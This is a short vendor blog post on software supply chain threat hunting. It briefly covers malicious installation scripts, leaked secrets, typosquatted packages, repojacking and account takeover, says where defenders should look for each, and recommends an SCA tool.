Threat Hunting 101: Five Common Threats to Look For
The software supply chain is increasingly complex, giving threat actors more opportunities to find ways into your system, either via custom code or third-party code.
In this blog we’ll briefly go over five supply chain threats and where to find them. For a deeper look to finding these threats, with more specifics and tool suggestions, check out our threat hunting guide.
Installation scripts
What it is:
After gaining access to the distribution network of software vendors or package managers, attackers can inject malicious code into the installation scripts of otherwise legitimate packages.
Where to look:
Installation scripts can show up on the developer machine, where they typically target personal and company data including credentials, or in the build process, where they will usually attempt to establish a backdoor and persistence.
Secrets Leak
What it is:
Secrets include API keys, passwords, and other types of credentials and confidential information that should be kept away from bad actors. They can be easily left behind in the development process, and it’s worth the effort to find them before your adversaries do.
Where to look:
While secrets can be anywhere in your code, they are often found in configuration files. Looking for secrets manually is a tough job. Tools exist to search your entire code base for you.
Malicious Artifacts
What it is:
Malicious artifacts are entered into the public registries that developers rely on for downloading libraries and applications in their programming language. Bad actors use techniques like typosquatting and brandjacking to make their malicious packages look like legitimate ones and trick unsuspecting developers into installing them. You can learn more about malicious packages here.
Where to look:
Malicious artifacts sit in public registries like NPM, Pypi, and Maven. A good SCA tool that detects malicious packages (we like Mend SCA, of course), can stop developers from adding these packages in the first place or find the packages that have already slipped through the cracks.
Repojacking
What it is:
Through rebranding and acquisitions, it is common for repository names to change. When that happens, threat actors can create new repositories with the old names and their malicious code. Now any project that dynamically links to the original repository is at risk.
Where to look:
Repojacking occurs on code-hosting platforms like GitHub, Bitbucket, or GitLab. Hunting these threats must be done by repository owners who should audit any changed or deleted names for new activity.
Account Takeover
What it is:
Through phishing attacks, weak passwords, stolen credentials, and social engineering, attackers can gain access to the accounts of repository owners and inject malicious code into widely used projects.
Where to look:
Monitor your account for irregular login activity and monitor your repository for suspicious patterns. Look at your security settings for your code hosting platform accounts (like GitHub, Bitbucket, or GitLab) as well as your email or any other services that are connected to make sure they are fortified.
If you’re not a repo owner but are still in the line of fire because your project requires open source packages that are at risk of repojacking or account takeover, you can protect yourself. Regularly scan your project with an SCA tool and educate your developers on best practices in open source code security.